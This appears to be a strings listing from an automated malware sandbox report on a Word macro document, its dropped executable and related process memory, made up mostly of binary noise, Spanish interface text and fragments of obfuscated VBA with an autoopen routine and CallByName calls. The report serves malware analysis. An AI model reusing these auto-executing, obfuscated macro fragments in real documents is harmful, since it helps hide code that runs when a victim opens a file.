Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55554444222222111111(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55554444444141411111(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55555555555555554444(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(8@HPXhpx (08@P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(bK*y*\CNormalrU~~~~~~~~hSM$taI)!UczLWa}o9ProjectThisDocumentModule1UserForm1F/%PROGRAMFILES(X86)%\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLLVBA

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(S8SPS`S$hSSSSSSSSST(T@THT`TxT

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(S<S<SS0{4A691620-ADED-4625-B68A-5F1266CFD7FA}{D820E972-EA97-4D95-A1D2-6BA6E67E2007}h0(%X0%0xAttribute VB_Name = "UserForm1"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ansi based on Dropped File (g545[1].exe.177218)

*(((((((((((((((((((()

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

*t}+lNO_SIMUL+Num`Simul:_saciones

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+((((((((((((((((((((*

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

+(+@+H+&h+++&++&,(,0,&P,x,,&,,&,-(-H-P-h-------..(.H.P.h.........//// /(/0/8/H/P/xX/////r/h0p0x0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+j+k/!

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+R KT 6 % KT n,p KT T n,pS( n,pn 6 % n,p n%p % n,p KT 6 KT n,p KT n,pnh KT 6 KT n,p "KT $ n,p &KT ( n,p *KT , n,p .KT 0 n,pn

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

,GuardarNORMA(Tmpo, AConfi>gKPEXT 7aTExc *G@GuTMedida.InicialesY`_CLBeocBR_CCLPeis"'LINX= 6f4JYON1GCIRF74*Sni"xt _CIN ABOuJtSPct AChar%aVa3"", PIPOLD2?2'a}28pu0do g#)3coDrr\ameo." &1'3x*5i5,555B 44

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

,No se pudo guardar el fichero correctamente. ` Z fERROR PROCESADO DE DATOS$X'8@2o82] 2' 8 !! 8@0P 8 !% 8+0 8 !!+R !!+R$R'B !!+R$R'D !!+R$R 'Fd1'Fk1 !!+R$R 'Hd0'Hk0 !!+R$R 'Jdp0'Jk`0 !!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

- 1)ReAPreserve@Mro.c1`B 8-I(a2f}End I</(INI>_Ic(2\CTEXxCIT@>+0fLINX@NddYoe`afCIRd12rFINvWCOMPi*cF?ve4U 5s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

-8,!2_1!Be=-For-= L Bound]) To U@%1& ChrE_8) - 9854-

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

..-.'J

Ansi based on Image Processing (screen_1.png)

.7603.16385 (win7_rtm.090713-1255)

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

.?AUIPropertyChangeListener@FlexUI@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AUIUnknown@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVBaseFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCAutoFollowupPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCCannotConnectPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCCompatDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCConnectCanceledPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiagnosticHost@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiagnosticsPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiskDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCIntroAutoPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCIntroManualPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCManualFollowupPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCMemDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCOMClassPCL@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCompositeFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCompositeFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVContainerFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVContainerFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCrashesHangsEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCResultsSummaryPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCRootEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCSetupDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCtrlContainerFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCtrlContainerFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCTryToConnectPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCUpdateDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCWatsonDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVDiskErrorsEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrameEqualizer@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVGroupBoxFrameImp

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVHorizFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVHorizFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVIDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVIDiagnosticHost@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVInstallerEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVLeafFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVLeafFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOS_HEAP@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOverlapFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOverlapFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVROCKALL_FRONT_END@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVTableFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

._.__-_-._._..

Ansi based on Image Processing (screen_4.png)

.`M%WINDIR%\SysWOW64\FM20.DLLMSForms

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.`ME{ThisDocumentGT@isDDjcueTn@2Q`H1x0-",~*""+Godule1GGo{u{12@3, !Ar0*U@ 8erfWa2C/-h*

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.De`scrip#Critical ERRORRe@sume N@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.iil._'0'i'il__.

Ansi based on Image Processing (screen_1.png)

.n.__ar

Ansi based on Image Processing (screen_0.png)

/n /dde

Ansi based on Process Commandline (WINWORD.EXE)

/SOURCE 1 /LCID 1031 /WAITPID 2676

Ansi based on Process Commandline (OffDiag.exe)

0*i2KT``4KT`6`8`:`<+D@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

00"00000000001111 1(10181@1X1`1h1p1111111111111112222 20282@2H2P2X2`2h2p2x222222222222222333 3(303@3H3P3X3`3h3p3x33333333333333334640H4x4$4"4

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0046}#2.0#0#%WINDIR%\SysWOW64\e2.tlb#OLE Automation`ENormalENCrmaQF *\C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0UserForm1XrU@$`n@LG{h

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

1bi.F. 1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

2 2$2(2,2024282<2@2D2

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

2KT 6 % 4KT 6 n,p 8KT : n,p <KT > n,p @KT B n,pn

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

3)`Ihc> VheAbAaYTruD8- 1wX.oc1S77 \w8].TAISAbSe|1!reateObj(mandata`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

4 %':k+ 4 % > 4 %'>kP+ 8k8+n0+ $N VB+|+8+"No existe el fichero o est? da?ado ` b!d Z fERROR PROCESADO DE DATOS$X'8*ox*

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

445&5@5H5(X555$555(56606H6P6,`6662666*707*87h7p7x7777777,8886X868,889909H9X9p99999: :8:@:X:p:::.:.:$;.0;`;;;;;;;;.<.8<h<<<<<== =8=H=`=$p===$==.>0>P>X>.h>>>>>>>

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5 2AVbMethod, i@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5 5$5(5,5054585<5@5D5

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5 5(50585@5H5P5X5,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5(6,6064686<6@6D6H6L6P6T6X6\6`6d6

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5B A?8A:0 "&$0{vhM<UV.

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

6.3.7603.16385

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

7K:!;?={=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

8$/8/FACTEXP9009010

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

85LROU1.9B7t.ras(C"0" TDcw%ElRoAn!<=

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8DHDXDpDDDDDDDDE(E8EPE`ExEEEEEEE,F0F6PF6F,FFGG(G@GPGhGxGGGGGH0H8HPHhHxHH.H.H$I.(IXIxIIIIIII.J.0J`JJJJJJKK0K@KXK$hKKK$KK.K(LHLPL.`LLLLLLL LLMMxMMM"MMM$MMM

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8kCPTHETA_CECN^-I-usDf d8L PHI9P910ZCENTRARbB";I211A,8NOUnc+=Els!cGray)@perd2:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8PHP`PxPPPPPPPPPPPQQ(Q@QPQhQxQQQQQQQQQRRRR0RHRPRXR`RhRRRRRRR"RRRRRRRRSSS S

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

9 9$9(9,9094989<9@9D9H9L9P9

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9ap0F%WINDIR%\SysWOW64\stdole2.tlbstdole

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

;='_-_'__'t-_-.t-_-.

Ansi based on Image Processing (screen_4.png)

<<Se han ignorado algunas entradas, compruebe la configuraci?n Z \AVISO PROCESADO DE DATOS$X'8kP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

=>@>}>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>!>?#?P?}?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>"$!)`bjbj.{{"""".FFFFFFFFeeeeee$hjFFFFFFFnnnF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

>??????"??????????@@@@ @(@0@8@@@X@`@h@p@@@@@@@@@@@@@@AAAA A(A0A8A@AHAPAXAhApAxAAAAAAAAAAAAAAAABBB B(B0B@BHBPBXB`BhBpBBBBBBBBBBBCCCC C0C8C@CHCPCXC`ChCpCxCCC*CC$C"D

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

>\]FIIIIIIIIIIFQ`LLLLLL_TRRR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>_]]QQQQQQRQRQQQ_``__STTRRRR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>S]]]]]]]]]]]]]]]]]]]]]]]]]...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>S]]a]aaa]]]]]]a```____R_R_U]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?(?0?8?@?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

?@?D?H?L?P?T?X?\?`?d?h?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

@%SystemRoot%\system32\dnsapi.dll,-103

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\System32\fveui.dll,-843

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\System32\fveui.dll,-844

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\system32\p2pcollab.dll,-8042

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\system32\qagentrt.dll,-10

Unicode based on Runtime Data (perdoma.exe )

@-= 0 ToAnsistidus.lstpcuencias.ListCoup- 1ep 1ReP0serve s1(i0?o

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@.data

Ansi based on Dropped File (g545[1].exe.177218)

@_R$BbROU&9;E"0" .TFCV ElroAh!A

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@srU~}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@|oc@F(F?oc(2T!NAz61y i` 1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

[Host Extender Info]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

[Workspace]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

\A4MsgBox("No existe el fdz`st? da?" _& vbNewB]&j.Description,BvbOKOnly +`Critical, "ERROR PROCESADO DE DATOS"Resume !"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

]9pU(3CPXbFcO%2JAECTHPH%6RHL=%6pEMEM|$%tV4[

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

_-----_l_l__''_:::''_:::''_:_l

Ansi based on Image Processing (screen_4.png)

_..,..

Ansi based on Image Processing (screen_1.png)

_4Sen94p>3(u\mvm'PNI.FU(5) = SinLe.tras(s)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

___-_-._._.

Ansi based on Image Processing (screen_1.png)

__________:.__--,____

Ansi based on Image Processing (screen_1.png)

__________:.__--____._

Ansi based on Image Processing (screen_4.png)

_uC O#s.TDd(7!/GVSONDA_1&= Prefw22q3q4q5q"A_$F'F%qT.1567u#a0A_q<A_A__-"CTx(11wf|GA4IsPUn`e~]NOP9PN.I0 FONo2SINCAMBIQL(CO3[t943;CPXYBS%FAEHPHTH#6RHL=%6EMEM|$_

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ai`F;%PROGRAMFILES%\(x86)\Microsoft Office\OFFICE11\MSWORD.OLBWord

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Asteriscos &ClaveDAMAn%cNOFREC@a ix(Val"(`oLe.s(Iz.!)MI> he%Tru+cJ[

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

b(=!s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

B> #@PrefCONCAMBIOSs %6#M"CSIFACTEX\"$f F`R <Close .perd9:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Bas0{4A691620-ADED-4625-B68A-5F1266CFD7FA}{D820E972-EA97-4D95-A1D2-6BA6E67E2007}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Bas1Normal.VGlobal!SpaclFalseCreatablPre declaIdTru

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

BE`xpose0TemplateDerivCus tomizDQ0*pHdProjectQ(@=

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

BExposeTemplateDeriv$CustomizC1Sub autoopen()

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

bHayCTruevP roc(8ECh eckedTH ETA_CCNZZs<oD.ch&8PHv+9X9+10V+@ENTRARXSelect BnPrefSI:11&LpANONUncKzElsCCGrayEnd &I2BB2nERDYGAN3

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

c t0E_2, mata(11VbMethod,Z5, 2

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

%COMMONPROGRAMFILES%\Microsoft Shared\office12;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Micros

Unicode based on Runtime Data (OffDiag.exe )

%TEMP%\C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Microsoft Office\Office12\

Unicode based on Runtime Data (perdoma.exe )

C]]]]]]]]]]]]]]]]]]]]]]]]]]...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

C_]a`a]]ac]a]a]a]a`a\a\a\ac...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

CadenaiAAux-lBooleaA= On Error GoTo Manipuxlar4$fI86lOpen ;FInpLutA#Do

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CallByName un

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CallByName0VbLetA0chkCPEF0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CAPU FrecsGo]pA*i0sProc) Step 1(i)Unch`eckedBxi0CharSinj3_.$_"I.&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CAPUFrecsGoTo perd4or i0 UBound(sa) St0ep 1(i)UncheckeNext

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Case ClaveTHETA_UL6rExjeDat.oIzqda(CadenavS

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Case PrefSONDA_1HsSNIFTD_E.XPAND(15) = ClaveHn2!n$73!7$End Sele4ct16oD.ch`FIN_o,hEs+NINI_SF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CharSinCargarQ0sSNIFTD_EXPAND0sSNIFTD_E0XPAND&0sSFIFT90sSFf0IFT0sCNIFTG0sCN0sPNIFT0sPN0sPNIFU0sPNIf0FUH]0ManipularErrorCargarProc(0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePHI_Pjf0ClaveFICHRNFOs0ClaveFICHPRB-i0ClaveFICHREFr0ClavePERDINS0ClaveFIN_PNIFT{0ClaveINI_PNIFUa0ClaveCENTGIRAR_UI0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePHI_Uof0ClaveFACTEXP0ClaveFINV0ClaveFIN_PNIFU|0EOF0Split)0UserForm1)0ComboBox1'0perd10MsgBoxR0vbOKOnly0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClavePNIFU0GuardarFichProc0SalirGuardarProc60sPathProceso 0frmProcesado0cboTExcitacion0rbp0VbGet0VbMethod0perd90chkNORMA0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ClientHeight = VBFrame^#PROJECTwmc_PROJECTeCompObjnq 3180

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

CPXGIqX?XpwX .FU(7<gXI!IOXt@"9sbhhpNSF_=&NCAMBIeD2:NSIFCO/'fRCMPTE-PXY(BAAEo`bFTHPHo`RHLaEMEMFORMA~T))_1(SI234E.RW?hV'bO.L.1.U/J%z(sUbR

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

D$@@x

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D:(A;;0x120003;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x120003;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x12001F;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x12001F;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x1201FD;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0xA201FD;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D@im unc@t`E_7() As Varian@@dMAr(10074, )86228i177#69b817j1$5C023277D%D#E9C7191.O@pen mata(5), AddFieldToM(29`Fa/GoTo ,be12_N1QN2MdERDYGANB^3ee__F~9r]`NQPNWqs>PXP]PR@_PveuSPPPSP@asyv@U;_Pj(1-PP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

DiagnosticsIdentifier:(SZ) 6bb5dc16-23a7-4e31-8904-aa3fab5a6b6ef3641097-703a-4f59-bd93-c700d9bdfdef

Ansi based on Dropped File (369281.od)

Dim mandata()-PROCESS_QUERY_INFORM ATION$400USub CargarFichProc(Nombreero1P)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ElsN|perd1: ~CallByName unc@t`E_2, mandata(7), VbLe3@CPEAsteriscos &, _INI_"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

End If Print #f, Clav eFIN_FU, vbNewLine\:Close perdD3:"unctE_2.OpenGuardarFichProc ""

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f":_+<:_;Q:_aOn } ypf $Fre l! KHputeDAMA,+txtQ2luW@NOFREClst`cuencias.ListCoun` A<0 0OC - 1ep i""_](iQ < iy]chTkN"ACI DWAsteriscos4:6qTEXCIT, hCS7COMP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b f%b f%b `k0 !! ~ ~ ~ ~ j%b j%b j%b j%b j%b j%b j%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

f%b f%b f%b `k86 !! ~ ~ ~ ~ j%b j%b j%b j%b j%b j%b j%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ansi based on Dropped File (g545[1].exe.177218)

f,b KT 6 % KT f,b KT T f,bS0 f,bn]$. $j B@'Z'f'f'b','!'!'\'\'U'a'^'^' '['`'!'''('Y'X'!'Y'''&''' 'W'j'W'D'*' 6 % f,b f%b % f,b KT 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

F.@bR5IICN_ s1^1&?P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

fG"2_[425<25L On Error GoTo ManipularGuardarProc

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FichConfig}0EXTin0TExcit0ManipularErrorGuardarNORMA<0uTMedida0Iniciales40Ini_CLBn0Ext_CCL60Ext_CCP:0Ext_CIN0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FICHERO_INCER ` !! 8 !! 8 !% 8 ` ! S/N_RUIDO !!dk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

FICHERO_INCERKT 6' KT 6 % %$': :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

G51[3_TK]6_c(X6]SOND4'.o't1Qr_o

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

G\GATru2lsaFa3&?~8yby?r#(9~ybyKTprpQ`_+1&wtUAbAo_A_A_Aao`_ArZAa@@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

GetCommProperties

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetCPInfoExW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

gjhCElse#EXPAN~C&Seln Caa$cbo9J.Tdb!LINX@IO= Pref"

